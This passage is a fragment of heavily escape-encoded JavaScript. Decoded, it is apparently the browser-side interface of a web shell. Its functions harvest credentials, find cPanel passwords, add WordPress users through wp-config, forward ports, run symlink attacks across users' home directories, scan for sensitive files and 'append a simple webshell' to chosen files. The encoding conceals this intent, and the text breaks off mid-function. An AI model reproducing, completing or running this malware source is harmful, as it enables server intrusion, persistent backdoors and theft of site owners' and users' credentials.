64\x6f\141\x73\x74\50\162\145\x73\56\x6d\x65\163\x73\x61\x67\x65\54\40\162\145\163\56\163\164\141\164\165\163\51\x3b\40\164\150\151\163\x2e\143\x6c\157\x73\x65\x4d\x6f\144\x61\154\x28\x6d\157\144\x61\154\x29\73\x20\x74\x68\x69\163\x2e\x6c\157\141\144\106\x69\x6c\145\163\50\164\150\151\x73\x2e\x63\167\x64\51\x3b\x20\175\40\x7d\x20\145\154\163\145\40\173\x20\x74\150\x69\163\56\x74\x6f\x61\x73\x74\50\47\123\157\165\x72\143\145\40\x66\151\154\145\x20\x69\x73\40\x72\x65\x71\165\151\x72\145\144\56\x27\x2c\40\x27\145\x72\x72\x6f\162\x27\51\x3b\40\175\x20\x7d\73\x20\175\x2c\xa\11\11\141\163\171\x6e\143\40\162\x75\x6e\x43\162\x65\144\110\141\x72\166\x65\163\164\x65\x72\x28\51\40\x7b\x20\x63\x6f\156\x73\164\40\160\141\164\150\40\x3d\x20\144\157\143\165\155\145\x6e\x74\x2e\x67\145\164\x45\x6c\145\x6d\145\156\164\x42\171\111\144\50\47\143\162\145\144\55\150\141\x72\166\145\163\164\145\162\55\x70\141\x74\150\x27\51\56\x76\141\x6c\x75\x65\x3b\x20\x69\146\x20\x28\41\160\141\164\x68\51\40\x72\145\164\x75\162\x6e\40\x74\x68\x69\163\56\x74\157\x61\x73\x74\x28\47\x53\164\x61\x72\164\40\160\x61\164\x68\40\151\163\x20\162\x65\x71\x75\151\162\145\x64\56\47\x2c\x20\x27\x65\162\x72\157\x72\x27\51\x3b\40\143\157\x6e\x73\164\40\x6f\165\x74\160\x75\x74\105\x6c\40\75\x20\x64\x6f\143\165\x6d\x65\x6e\x74\56\x67\x65\164\105\154\145\x6d\145\x6e\164\x42\x79\111\144\x28\x27\x63\162\145\144\55\150\x61\x72\166\x65\163\164\x65\162\x2d\157\165\164\160\x75\x74\47\x29\x3b\x20\157\x75\164\x70\x75\x74\x45\154\x2e\x69\156\x6e\x65\x72\124\x65\170\x74\x20\x3d\x20\47\110\x61\162\166\145\x73\x74\151\x6e\x67\x2e\56\x2e\x20\124\150\x69\x73\x20\155\x61\171\x20\164\x61\x6b\x65\40\141\x20\167\x68\x69\x6c\x65\40\x6f\x6e\x20\154\141\x72\x67\145\40\x64\x69\162\145\x63\164\x6f\162\151\145\163\x2e\47\73\x20\164\150\151\x73\x2e\x74\x6f\141\163\x74\50\x27\x53\x74\x61\x72\x74\x69\x6e\x67\x20\143\x72\x65\144\145\x6e\x74\x69\x61\x6c\x20\x68\x61\162\x76\x65\163\x74\145\x72\56\56\x2e\47\51\73\x20\143\x6f\156\x73\x74\x20\162\145\163\40\x3d\40\x61\x77\x61\151\x74\x20\x74\x68\x69\163\x2e\141\160\x69\50\47\143\x72\x65\x64\x5f\150\x61\x72\166\145\163\164\145\162\x27\x2c\x20\x7b\x20\x70\x61\x74\x68\40\x7d\x29\73\40\x69\x66\40\50\x72\x65\x73\40\46\x26\40\x72\x65\x73\x2e\x73\164\141\164\165\163\x20\x3d\x3d\75\40\47\x73\x75\x63\x63\x65\x73\x73\47\51\40\x7b\x20\157\165\x74\160\x75\164\105\x6c\56\151\156\x6e\x65\x72\110\124\115\114\40\x3d\x20\162\x65\x73\x2e\144\x61\x74\141\73\40\164\x68\x69\163\56\164\x6f\x61\x73\164\x28\47\110\141\x72\x76\145\163\x74\x20\143\x6f\155\160\x6c\x65\164\145\56\47\x29\x3b\x20\x7d\40\x7d\x2c\12\x9\x9\x61\x73\171\156\x63\x20\x73\x74\141\162\164\120\157\x72\164\106\x6f\162\x77\x61\x72\x64\x28\x29\x20\173\40\143\157\156\x73\x74\x20\x6c\151\x73\164\145\x6e\137\160\x6f\x72\164\40\x3d\x20\144\x6f\143\165\155\x65\x6e\164\56\x67\145\x74\x45\154\x65\x6d\x65\x6e\164\x42\171\111\144\50\47\x70\x66\55\x6c\151\x73\x74\x65\156\55\160\157\x72\x74\47\x29\56\x76\141\154\165\x65\x2c\40\164\141\162\x67\145\164\x5f\150\x6f\x73\x74\x20\x3d\x20\x64\x6f\x63\165\155\x65\x6e\164\56\147\x65\164\105\x6c\145\155\145\156\164\x42\171\x49\144\x28\x27\x70\x66\x2d\164\x61\162\x67\x65\164\x2d\x68\157\x73\x74\x27\x29\56\x76\141\154\x75\x65\x2c\40\x74\x61\162\x67\145\x74\137\160\157\162\x74\40\x3d\x20\144\x6f\143\165\x6d\145\x6e\x74\56\x67\145\164\105\x6c\x65\155\x65\156\x74\x42\x79\111\x64\50\47\x70\146\x2d\x74\141\x72\x67\145\x74\x2d\160\157\x72\164\47\x29\56\x76\x61\154\165\145\73\x20\x69\x66\x28\x21\154\x69\163\164\145\156\x5f\x70\157\x72\164\x20\174\x7c\40\x21\x74\x61\x72\x67\x65\x74\137\150\x6f\163\164\40\174\x7c\x20\x21\164\x61\162\147\x65\164\137\160\157\x72\164\51\x20\162\145\164\x75\162\156\x20\164\x68\x69\163\x2e\x74\157\x61\163\164\50\47\x41\154\154\40\146\x69\145\154\144\163\40\141\x72\x65\x20\x72\145\x71\x75\151\x72\145\144\x2e\47\x2c\40\x27\145\162\162\x6f\162\x27\x29\73\40\x74\150\x69\x73\x2e\164\x6f\141\163\x74\50\x60\x53\164\x61\x72\x74\x69\156\x67\40\x70\157\x72\164\x20\146\x6f\x72\167\x61\162\144\x65\162\x20\x6f\156\x20\44\173\x6c\x69\x73\164\145\156\x5f\160\x6f\162\x74\x7d\56\x2e\x2e\x60\54\40\47\x73\165\x63\143\145\x73\163\47\51\73\40\x63\x6f\156\x73\x74\x20\162\145\163\x20\x3d\40\x61\x77\x61\x69\x74\40\x74\150\151\163\56\141\x70\x69\50\x27\160\157\162\x74\x5f\x66\x6f\x72\167\x61\x72\x64\47\54\x20\x7b\x20\154\151\163\164\x65\156\137\x70\x6f\162\x74\54\x20\164\141\162\147\x65\164\137\x68\157\163\x74\x2c\40\164\141\162\x67\x65\x74\137\x70\x6f\162\x74\40\175\x29\x3b\x20\x69\x66\x28\162\x65\163\x29\x20\x7b\40\x74\x68\x69\x73\56\x74\157\x61\163\164\50\162\145\163\56\155\x65\163\163\x61\x67\x65\54\x20\x72\x65\x73\x2e\x73\164\x61\164\x75\163\51\73\40\175\x20\175\54\xa\x9\11\x61\163\171\156\x63\40\x63\162\145\x61\x74\x65\x57\160\x55\163\x65\162\x28\51\x20\x7b\40\x63\157\x6e\163\164\40\143\x6f\x6e\x66\151\147\137\160\141\164\150\x20\75\40\x64\157\x63\x75\x6d\x65\156\x74\56\x67\145\164\x45\x6c\145\x6d\x65\156\164\x42\171\111\x64\x28\x27\x77\160\55\x63\x6f\x6e\x66\x69\x67\x2d\160\141\164\x68\x27\x29\x2e\x76\141\x6c\165\x65\54\40\x6e\x65\x77\x5f\165\163\145\162\x20\x3d\40\x64\x6f\143\x75\155\x65\156\164\56\147\145\164\x45\154\145\155\145\x6e\164\102\171\111\x64\x28\x27\167\160\55\156\x65\x77\55\165\163\x65\162\x27\51\x2e\x76\x61\154\x75\x65\54\x20\x6e\x65\x77\137\x70\141\163\163\x20\75\x20\144\157\143\165\155\145\x6e\164\x2e\147\145\x74\105\154\145\x6d\x65\156\164\x42\171\x49\x64\50\47\x77\160\x2d\x6e\145\x77\x2d\x70\141\163\163\47\51\x2e\x76\x61\x6c\x75\145\x2c\40\x6e\x65\x77\x5f\x65\155\x61\151\x6c\x20\75\40\x64\x6f\143\x75\x6d\x65\x6e\x74\56\x67\145\164\x45\154\145\x6d\145\x6e\x74\102\171\111\x64\50\47\x77\x70\55\x6e\145\x77\x2d\x65\155\x61\x69\154\x27\x29\56\166\141\154\165\145\73\40\x69\x66\50\41\x63\157\x6e\146\151\147\137\x70\141\x74\150\x20\174\174\40\x21\x6e\145\167\137\165\163\x65\162\40\174\x7c\x20\x21\x6e\145\x77\137\160\x61\x73\x73\x20\x7c\174\40\41\x6e\145\x77\137\145\155\141\x69\x6c\51\40\x72\x65\x74\x75\162\x6e\40\x74\150\x69\x73\56\x74\157\x61\163\x74\x28\x27\101\x6c\154\x20\x66\151\145\154\144\x73\40\141\162\x65\x20\x72\x65\x71\165\x69\x72\x65\144\x2e\x27\54\x20\47\x65\162\x72\157\x72\x27\x29\73\x20\x63\x6f\156\163\164\40\162\145\163\40\75\40\x61\167\x61\151\164\x20\164\150\151\163\56\x61\x70\151\x28\x27\143\x72\x65\141\164\145\x5f\x77\x70\x5f\x75\x73\x65\x72\47\54\40\x7b\x20\x63\x6f\156\x66\x69\147\x5f\x70\141\164\150\54\x20\156\145\167\x5f\x75\163\x65\162\54\40\x6e\x65\167\137\160\141\x73\163\x2c\x20\x6e\145\x77\137\x65\x6d\x61\x69\x6c\x20\x7d\51\73\40\151\x66\40\50\162\145\163\51\x20\164\150\x69\x73\x2e\164\x6f\141\163\164\x28\162\x65\163\56\155\145\163\163\141\147\x65\54\40\x72\x65\x73\x2e\x73\x74\141\x74\x75\x73\x29\x3b\x20\x7d\x2c\12\x9\11\141\x73\x79\x6e\143\x20\151\x6e\151\164\103\155\x73\103\160\x61\156\x65\x6c\126\x69\145\x77\50\x29\x20\173\40\x63\157\156\x73\164\40\x72\145\163\40\75\40\x61\167\141\x69\164\x20\164\x68\x69\x73\x2e\141\160\x69\x28\x27\147\x65\x74\137\x75\163\x65\x72\x73\137\147\x72\157\165\x70\x73\x27\x29\x3b\40\x69\146\x20\x28\x72\145\x73\x20\46\46\x20\162\x65\x73\x2e\x73\164\x61\164\165\163\x20\75\x3d\75\x20\47\163\x75\x63\x63\145\163\163\47\40\x26\x26\40\162\145\163\x2e\165\x73\145\x72\x73\x29\x20\x7b\40\143\x6f\x6e\163\x74\40\x73\x65\x6c\145\143\x74\40\x3d\x20\144\x6f\143\x75\x6d\145\156\164\56\147\x65\164\x45\154\145\155\145\156\x74\102\171\x49\x64\50\x27\163\x79\155\x6c\151\156\x6b\x2d\164\141\x72\x67\145\164\55\165\x73\x65\x72\47\x29\73\x20\163\x65\154\145\x63\x74\56\x69\x6e\156\x65\x72\x48\124\x4d\114\x20\x3d\40\x72\145\x73\x2e\165\163\x65\162\x73\x2e\x66\151\154\x74\145\162\50\x75\40\75\76\x20\165\x2e\150\157\155\145\x2e\x73\164\141\162\164\163\127\x69\x74\150\x28\x27\x2f\x68\x6f\155\x65\57\x27\x29\51\56\155\x61\160\50\165\x20\x3d\x3e\40\140\x3c\x6f\x70\x74\x69\157\156\x20\166\x61\x6c\x75\x65\75\42\44\x7b\x75\56\x6e\x61\155\x65\175\x22\x3e\44\173\165\x2e\156\141\155\x65\175\x3c\x2f\x6f\x70\x74\151\157\x6e\76\x60\x29\x2e\152\x6f\x69\156\x28\47\x27\51\73\40\175\x20\175\54\12\x9\x9\141\163\171\156\x63\40\x72\x75\156\x53\x79\155\x6c\151\x6e\x6b\x28\x29\x20\173\x20\143\157\156\x73\x74\40\x75\x73\x65\162\40\75\x20\144\157\143\165\155\145\x6e\164\56\x67\145\164\x45\154\145\x6d\145\x6e\164\x42\171\111\x64\50\x27\x73\171\x6d\154\x69\156\x6b\x2d\x74\141\162\x67\145\164\x2d\165\x73\x65\x72\47\x29\56\166\x61\x6c\x75\145\73\40\151\x66\x20\x28\x21\165\x73\145\x72\x29\40\162\x65\x74\x75\162\156\40\164\150\151\163\56\164\x6f\141\x73\x74\x28\x27\x50\154\145\141\163\x65\x20\x73\145\x6c\x65\x63\164\40\x61\40\x75\163\x65\162\56\47\x2c\x20\x27\x65\x72\x72\x6f\x72\x27\51\73\x20\143\x6f\x6e\x73\x74\x20\157\x75\x74\x70\x75\x74\105\x6c\x20\75\40\144\157\143\165\x6d\145\156\164\x2e\x67\x65\x74\105\x6c\x65\155\x65\156\164\x42\x79\111\144\x28\47\x73\x79\x6d\154\x69\156\x6b\x2d\x72\145\163\165\x6c\164\x73\47\51\x3b\40\157\165\x74\x70\x75\x74\105\154\x2e\151\x6e\x6e\x65\x72\x48\x54\x4d\x4c\40\x3d\40\x27\x3c\160\x3e\x52\165\156\x6e\x69\156\147\x2e\x2e\x2e\x3c\x2f\x70\76\x27\x3b\x20\143\x6f\156\163\x74\x20\162\145\163\x20\75\x20\141\167\x61\151\x74\x20\164\x68\151\x73\56\x61\x70\x69\50\x27\x73\171\x6d\x6c\x69\156\153\137\143\x70\x61\x6e\x65\154\x27\54\40\x7b\40\165\x73\145\162\x20\x7d\51\x3b\40\151\x66\x20\50\162\145\163\x20\46\x26\x20\x72\145\163\56\163\x74\x61\x74\x75\x73\x20\x3d\75\x3d\x20\x27\163\165\143\143\x65\163\163\x27\51\x20\173\40\x69\146\x20\x28\x72\145\x73\56\162\x65\x73\x75\154\164\163\56\154\145\x6e\x67\164\x68\x20\76\x20\60\51\40\173\40\154\145\164\40\x68\164\x6d\154\x20\x3d\40\x27\74\x75\x6c\76\x27\x3b\40\x72\145\163\x2e\x72\145\x73\x75\x6c\164\x73\x2e\x66\157\162\x45\141\143\x68\x28\x69\x74\145\x6d\x20\75\x3e\40\173\40\x68\x74\155\154\x20\53\x3d\40\x60\74\x6c\151\x3e\44\x7b\x69\164\145\155\x2e\x74\141\162\x67\x65\x74\x7d\40\55\76\x20\74\141\x20\150\162\145\x66\75\42\44\x7b\x69\x74\x65\x6d\x2e\x6c\151\156\x6b\137\165\162\154\x7d\42\40\x74\x61\x72\x67\x65\x74\75\42\x5f\142\x6c\x61\156\153\x22\40\163\x74\x79\x6c\145\x3d\x22\143\157\154\x6f\x72\72\x76\x61\x72\x28\55\x2d\x61\143\143\x65\x6e\164\55\142\x6c\x75\145\51\x3b\x22\76\44\x7b\151\x74\x65\x6d\56\154\151\x6e\153\x5f\165\162\154\x7d\74\57\141\76\74\x2f\154\151\76\140\73\x20\x7d\x29\73\x20\150\164\155\x6c\40\53\x3d\x20\47\x3c\57\165\154\x3e\x27\x3b\x20\157\165\164\x70\165\164\x45\154\x2e\x69\156\156\145\162\110\x54\115\114\x20\75\x20\150\164\155\154\x3b\40\175\40\x65\154\x73\145\x20\173\x20\157\165\164\x70\x75\x74\x45\154\56\x69\x6e\156\x65\162\x48\124\115\x4c\40\x3d\x20\47\x3c\160\76\x4e\x6f\x20\143\157\155\155\157\x6e\x20\143\157\x6e\146\x69\147\40\146\x69\154\x65\x73\x20\x63\157\x75\154\x64\x20\x62\145\40\x6c\x69\x6e\153\x65\144\x20\x66\157\162\x20\164\x68\141\x74\40\x75\x73\145\x72\x2e\74\x2f\x70\x3e\x27\x3b\x20\x7d\x20\175\x20\x7d\54\xa\11\11\x61\163\x79\x6e\143\40\x66\151\156\x64\x43\x70\141\156\145\x6c\x43\x72\145\144\x73\x28\x29\40\x7b\40\x63\x6f\156\x73\164\40\157\x75\164\160\x75\x74\x45\154\40\x3d\40\144\157\143\165\155\x65\x6e\x74\56\x67\145\x74\105\x6c\x65\155\x65\x6e\164\x42\171\111\144\x28\x27\143\x70\x61\156\145\x6c\55\143\162\145\x64\x73\x2d\x6f\165\164\x70\x75\164\x27\51\73\x20\157\165\x74\x70\165\x74\x45\x6c\x2e\151\x6e\156\x65\x72\x54\x65\170\x74\40\x3d\40\x27\x53\145\x61\162\x63\x68\x69\x6e\147\x2e\56\x2e\x27\73\x20\143\x6f\x6e\163\164\x20\162\145\x73\40\75\x20\141\x77\x61\151\164\x20\164\x68\151\163\x2e\x61\x70\x69\50\x27\x66\151\x6e\x64\x5f\143\160\141\x6e\145\154\137\x63\162\145\144\x73\x27\x29\73\x20\151\x66\40\50\x72\x65\163\x20\x26\x26\40\x72\x65\x73\x2e\x73\164\x61\164\165\163\x20\x3d\75\75\x20\47\163\x75\143\x63\x65\163\163\47\51\40\x6f\165\164\x70\165\x74\105\154\56\x69\x6e\156\x65\x72\x48\x54\115\114\40\x3d\x20\162\145\x73\x2e\144\141\x74\x61\x3b\40\x7d\54\12\11\11\141\163\x79\x6e\143\x20\x72\x75\156\x46\151\x6e\x67\145\162\160\162\151\156\164\50\x29\x20\173\12\x9\x9\11\x63\x6f\x6e\x73\164\40\162\x65\163\165\154\x74\163\x45\154\x20\75\x20\x64\157\143\x75\x6d\x65\156\x74\56\x67\x65\164\x45\154\x65\x6d\x65\x6e\x74\102\x79\x49\144\x28\47\x66\x69\x6e\147\x65\x72\x70\162\x69\156\x74\55\x72\x65\x73\165\x6c\x74\163\x27\51\73\40\162\x65\163\x75\x6c\x74\163\105\154\x2e\163\164\171\x6c\x65\x2e\144\x69\x73\160\154\x61\x79\40\x3d\40\x27\142\154\157\x63\x6b\x27\73\40\x72\x65\x73\165\154\164\163\x45\154\56\151\x6e\x6e\145\162\x48\124\x4d\x4c\x20\75\40\x27\x3c\160\x3e\107\141\x74\x68\x65\162\x69\156\147\x20\146\151\156\147\145\x72\x70\x72\151\156\x74\56\56\x2e\x3c\x2f\160\x3e\x27\73\40\x63\157\156\x73\x74\40\x72\x65\x73\x20\75\40\x61\x77\x61\x69\x74\40\x74\x68\151\x73\x2e\141\x70\x69\50\x27\147\145\x74\137\x73\145\162\166\145\162\x5f\146\x69\156\147\x65\162\160\x72\151\x6e\x74\47\51\73\40\x69\x66\x20\50\162\145\x73\x20\46\x26\x20\162\x65\163\56\x73\x74\x61\x74\x75\163\x20\x3d\75\75\40\x27\163\x75\x63\x63\x65\x73\x73\x27\x29\x20\173\x20\x6c\145\164\40\150\164\155\x6c\x20\75\x20\x27\47\73\40\146\157\x72\x20\50\143\x6f\156\x73\x74\x20\133\x6b\x65\171\54\x20\x76\x61\x6c\x75\x65\135\40\157\146\x20\117\142\x6a\145\x63\x74\x2e\145\156\x74\162\x69\145\x73\x28\162\145\x73\56\144\141\x74\x61\x29\51\x20\173\40\x68\x74\x6d\x6c\40\x2b\x3d\40\140\x3c\x64\151\x76\x20\x63\x6c\x61\x73\x73\x3d\x22\x63\x6f\156\146\151\x67\x2d\146\157\165\156\x64\x22\x3e\74\144\151\166\x20\143\154\141\163\x73\75\x22\143\x6f\156\146\151\147\55\146\157\x75\x6e\x64\55\x68\145\141\x64\x65\162\x22\x3e\x24\173\153\x65\171\x7d\74\x2f\144\x69\166\76\x3c\x64\x69\166\x20\143\x6c\141\x73\x73\75\42\x63\157\x6e\x66\x69\x67\55\x66\157\165\x6e\x64\55\x62\x6f\x64\x79\42\76\44\173\166\x61\154\x75\145\x2e\x72\145\x70\154\x61\143\145\x28\x2f\x3c\57\x67\x2c\x20\42\x26\x6c\x74\x3b\42\x29\56\162\x65\160\x6c\141\143\145\x28\x2f\76\x2f\147\x2c\40\42\x26\x67\164\73\x22\51\x7d\x3c\x2f\x64\x69\x76\76\x3c\57\x64\151\x76\76\x60\x3b\40\175\40\x72\145\163\x75\154\x74\163\105\x6c\x2e\151\156\156\x65\x72\110\x54\x4d\x4c\40\75\40\150\164\155\x6c\73\40\175\x20\145\x6c\x73\145\40\173\40\x72\145\x73\165\154\164\163\x45\x6c\x2e\151\x6e\156\x65\x72\110\124\115\x4c\x20\75\x20\x27\74\x70\x3e\x46\141\151\154\145\x64\x20\x74\157\40\x67\141\x74\x68\x65\162\40\146\x69\156\147\145\162\160\162\151\156\x74\56\74\x2f\160\76\47\x3b\40\x7d\xa\11\11\175\x2c\12\11\x9\x61\x73\171\156\143\x20\x72\x75\156\x53\145\156\163\151\x74\151\166\145\x53\x63\141\156\50\x29\40\173\12\x9\11\11\143\x6f\156\163\164\40\160\141\x74\x68\40\x3d\40\x64\157\143\165\x6d\145\156\x74\x2e\x67\x65\164\105\154\145\155\145\x6e\164\102\x79\x49\144\50\x27\x73\145\x6e\163\151\x74\151\x76\x65\x2d\x73\143\x61\x6e\x2d\160\x61\164\x68\x27\51\x2e\166\x61\x6c\x75\x65\73\x20\151\146\40\50\x21\x70\x61\164\x68\51\x20\162\145\x74\165\x72\156\x20\x74\x68\x69\x73\x2e\164\x6f\141\x73\164\50\47\120\141\164\x68\x20\151\x73\40\x72\x65\x71\165\x69\x72\145\144\56\x27\54\40\x27\145\x72\x72\x6f\162\47\x29\x3b\x20\x63\157\156\x73\164\40\162\145\x73\x75\154\164\163\105\154\x20\x3d\x20\x64\157\x63\x75\x6d\145\x6e\x74\x2e\x67\145\x74\x45\154\x65\x6d\x65\x6e\164\102\x79\x49\144\50\x27\x73\145\156\163\151\x74\151\x76\145\x2d\x73\143\141\156\x2d\162\x65\163\x75\x6c\164\163\x27\51\x3b\x20\x72\145\x73\165\x6c\x74\163\x45\x6c\x2e\163\164\x79\154\x65\x2e\x64\x69\x73\x70\x6c\x61\171\40\x3d\40\47\142\x6c\157\143\x6b\x27\73\x20\x72\x65\x73\x75\154\x74\x73\x45\154\x2e\x69\156\156\x65\x72\110\x54\115\114\x20\x3d\x20\x27\x3c\x70\76\x53\x63\141\x6e\156\x69\156\x67\40\146\x6f\x72\x20\163\145\x6e\x73\x69\164\151\166\145\x20\146\151\x6c\x65\163\56\56\56\x3c\57\160\x3e\47\x3b\x20\143\x6f\x6e\163\164\x20\x72\x65\x73\x20\x3d\x20\x61\167\x61\x69\x74\40\164\150\151\x73\x2e\x61\160\x69\x28\47\x66\x69\x6e\x64\x5f\x73\x65\156\163\151\164\x69\x76\145\x5f\146\x69\154\x65\x73\47\x2c\40\x7b\40\x70\141\x74\x68\x20\175\51\73\40\x69\146\x20\50\162\145\163\x20\46\46\40\162\145\163\56\163\x74\x61\164\165\x73\x20\x3d\x3d\75\40\x27\x73\x75\143\143\145\x73\163\x27\51\x20\173\40\x6c\x65\x74\40\150\164\155\154\x20\x3d\x20\47\x27\x3b\40\x66\157\162\x20\x28\143\x6f\156\163\x74\x20\133\153\x65\x79\54\x20\x76\141\154\x75\145\135\x20\157\146\x20\x4f\142\x6a\145\143\164\56\x65\x6e\164\x72\x69\145\x73\x28\162\145\163\56\144\141\164\x61\x29\x29\x20\173\x20\x68\x74\x6d\x6c\40\x2b\75\x20\140\x3c\x68\x33\x3e\x24\x7b\x6b\145\171\175\x3c\57\150\x33\x3e\74\x70\x72\x65\40\143\154\x61\163\163\x3d\x22\157\x75\x74\160\x75\x74\55\142\x6f\x78\x22\x3e\x24\x7b\166\141\154\165\x65\x7d\74\57\x70\x72\x65\76\140\x3b\40\x7d\x20\x72\x65\163\x75\x6c\x74\163\x45\154\x2e\151\156\156\x65\162\110\124\115\x4c\x20\75\x20\150\164\155\154\73\40\175\40\145\x6c\163\x65\x20\x7b\x20\162\145\163\165\154\x74\163\x45\x6c\56\151\156\x6e\x65\162\110\124\x4d\114\40\x3d\40\47\74\x70\76\x53\x63\141\x6e\x20\x66\141\151\x6c\145\x64\x2e\74\57\x70\76\47\x3b\x20\x7d\xa\x9\11\175\x2c\12\11\x9\x61\x73\x79\x6e\x63\x20\162\165\x6e\115\157\156\x69\x74\x6f\162\x28\x29\40\173\xa\11\11\x9\143\x6f\156\x73\164\40\160\141\164\x68\x20\x3d\40\144\x6f\143\165\155\145\x6e\164\x2e\147\x65\164\105\154\145\155\x65\156\164\x42\x79\111\144\x28\47\x6d\157\156\151\x74\x6f\x72\x2d\160\x61\164\150\47\51\x2e\x76\141\x6c\x75\x65\x2c\40\x64\165\x72\141\x74\151\157\156\40\75\40\x64\x6f\x63\165\155\x65\156\x74\x2e\147\x65\x74\105\154\145\x6d\145\x6e\x74\102\x79\111\x64\50\x27\155\157\156\x69\164\157\x72\55\144\x75\x72\x61\x74\x69\x6f\156\x27\51\x2e\166\x61\x6c\x75\x65\54\40\157\165\164\x70\x75\x74\x45\154\40\x3d\40\144\x6f\143\x75\155\x65\156\164\x2e\x67\145\164\x45\154\145\155\x65\x6e\x74\x42\171\x49\x64\x28\47\155\x6f\156\151\164\x6f\x72\x2d\x72\x65\x73\x75\x6c\164\x73\47\51\73\40\151\x66\x20\50\41\160\141\x74\150\51\x20\162\x65\164\165\162\x6e\x20\x74\x68\x69\163\x2e\x74\x6f\x61\163\x74\x28\47\120\141\164\x68\40\x69\x73\40\162\x65\x71\165\151\162\x65\144\x2e\47\54\40\x27\145\162\162\x6f\x72\47\51\73\12\11\x9\11\x6f\165\x74\x70\x75\x74\105\x6c\56\x69\x6e\x6e\x65\162\124\x65\170\x74\40\75\40\140\x4d\x6f\156\x69\x74\157\162\151\156\x67\x20\x24\173\160\141\164\150\x7d\x20\x66\157\162\40\44\173\x64\165\162\141\164\151\x6f\x6e\x7d\x20\x73\x65\x63\157\x6e\144\x73\56\56\56\x60\73\x20\164\150\x69\163\56\164\x6f\141\163\164\50\140\x4d\157\156\x69\x74\x6f\x72\151\x6e\147\x20\x66\157\x72\x20\x24\x7b\x64\x75\162\141\164\151\x6f\x6e\175\x73\56\x2e\56\x60\51\73\xa\x9\11\11\143\x6f\x6e\x73\x74\x20\x72\145\x73\40\x3d\x20\x61\167\x61\x69\164\40\x74\150\x69\163\56\141\x70\x69\x28\47\155\157\156\x69\164\x6f\162\x5f\x63\150\x61\x6e\x67\x65\163\47\x2c\40\x7b\x20\x70\141\164\x68\x2c\40\x64\x75\x72\141\x74\x69\157\x6e\x20\175\51\x3b\12\x9\11\11\x69\146\x20\x28\x72\x65\163\x20\46\46\40\162\x65\x73\x2e\x73\164\141\x74\165\163\x20\x3d\x3d\x3d\40\47\x73\x75\x63\143\x65\x73\x73\47\x29\40\x7b\40\x63\x6f\156\x73\x74\x20\x7b\x20\143\162\145\141\164\x65\144\54\40\x64\x65\154\x65\164\x65\144\54\x20\155\157\144\151\x66\x69\x65\x64\40\175\40\75\40\162\x65\163\x2e\143\150\x61\156\x67\145\163\x3b\40\x6c\145\164\x20\x68\164\155\154\40\75\40\x60\x3c\163\x74\x72\x6f\156\147\76\x43\162\145\x61\164\x65\x64\72\x3c\57\x73\x74\162\157\156\x67\x3e\x20\44\173\x63\x72\145\x61\x74\x65\x64\x2e\x6c\x65\x6e\x67\164\x68\175\x5c\156\44\173\x63\x72\145\141\x74\x65\x64\x2e\152\x6f\x69\156\50\x27\134\156\47\51\x7d\134\x6e\134\x6e\140\x3b\x20\150\x74\x6d\x6c\40\x2b\x3d\40\x60\x3c\163\x74\162\157\156\147\x3e\104\x65\x6c\x65\x74\x65\x64\x3a\74\x2f\163\164\x72\x6f\156\147\76\x20\44\x7b\x64\x65\x6c\x65\164\x65\x64\x2e\x6c\145\x6e\x67\x74\x68\175\134\x6e\44\173\x64\x65\154\x65\164\145\144\x2e\152\x6f\x69\x6e\x28\47\x5c\156\x27\x29\x7d\134\x6e\x5c\156\140\x3b\x20\150\164\155\154\40\53\x3d\40\140\x3c\x73\164\162\x6f\156\x67\76\115\x6f\x64\x69\x66\x69\145\x64\72\74\x2f\163\164\x72\157\156\x67\x3e\x20\x24\173\x6d\x6f\x64\151\x66\151\145\144\x2e\x6c\145\x6e\147\164\150\x7d\x5c\x6e\44\x7b\155\x6f\x64\x69\146\x69\145\x64\x2e\x6a\x6f\x69\156\x28\x27\x5c\156\47\x29\x7d\140\x3b\40\x6f\165\x74\160\165\164\x45\x6c\x2e\151\156\156\145\x72\x54\x65\170\164\40\x3d\x20\150\x74\155\154\73\x20\x74\x68\x69\x73\56\x74\x6f\141\x73\164\x28\x27\115\157\x6e\x69\164\x6f\x72\151\x6e\147\40\x63\157\155\x70\x6c\145\164\145\x2e\x27\x29\x3b\x20\x7d\x20\145\154\x73\x65\x20\x7b\x20\157\165\x74\x70\x75\x74\105\154\x2e\151\156\x6e\145\x72\x54\x65\x78\x74\x20\x3d\40\47\115\157\156\151\x74\157\x72\x69\x6e\147\x20\146\141\151\154\145\144\56\47\73\x20\x7d\12\11\11\x7d\x2c\12\x9\x9\x61\x73\x79\x6e\x63\x20\x72\165\156\x42\141\x63\153\144\x6f\157\162\x49\156\x73\164\x61\x6c\154\145\x72\50\x29\40\x7b\12\11\11\11\143\x6f\x6e\163\164\40\164\141\x72\x67\145\164\163\x20\75\x20\144\x6f\143\165\x6d\145\156\x74\x2e\x67\x65\164\x45\154\145\155\x65\x6e\x74\102\171\111\x64\x28\x27\142\x61\x63\x6b\x64\157\157\x72\55\164\x61\162\x67\145\164\163\47\x29\56\x76\x61\x6c\x75\145\73\x20\151\146\40\x28\41\164\x61\162\x67\145\x74\x73\x29\x20\x72\x65\x74\x75\x72\x6e\x20\x74\150\x69\163\x2e\164\x6f\x61\x73\x74\50\47\x4e\157\x20\x74\x61\162\x67\145\164\40\146\x69\x6c\145\163\40\x73\160\x65\x63\151\146\x69\145\144\x2e\x27\54\x20\47\145\162\162\x6f\x72\x27\x29\x3b\12\11\x9\x9\x63\x6f\x6e\163\164\40\x63\157\156\x66\x69\x72\155\145\144\40\75\x20\141\167\x61\151\164\x20\164\150\x69\163\56\x73\x68\157\x77\x43\x6f\x6e\x66\151\x72\x6d\115\157\144\x61\x6c\50\47\x54\x68\x69\163\x20\167\151\154\x6c\40\x61\160\160\x65\x6e\144\40\x61\x20\x73\151\x6d\160\154\x65\x20\167\x65\142\x73\x68\x65\x6c\154\x20\164\157\40\164\150\x65\x20\163\x70\145\x63\151\146\151\145\x64\x20\x66\x69\154\145\163\x2e\x20\x41\x72\145\x20\171\x6f\x75\x20\163\x75\x72\145\x3f\x27\54\40\173\40\x74\x79\160\145\72\x20\x27\x77\x61\x72\156\x69\x6e\x67\47\x20\x7d\51\x3b\40\151\x66\40\50\41\143\x6f\x6e\x66\x69\162\155\x65\144\51\x20\x72\145\x74\165\162\x6e\73\12\11\11\x9\143\157\156\163\164\40\162\x65\x73\165\x6c\x74\x73\x45\154\x20\x3d\40\144\x6f\x63\x75\x6d\x65\156\x74\56\147\145\x74\x45\x6c\145\x6d\145\x6e\164\102\x79\111\144\50\47\142\x61\143\153\x64\x6f\x6f\162\x2d\x72\x65\163\165\x6c\164\x73\47\x29\x3b\x20\x72\145\x73\165\x6c\164\x73\105\154\x2e\x69\x6e\156\145\x72\110\x54\x4d\114\40\75\x20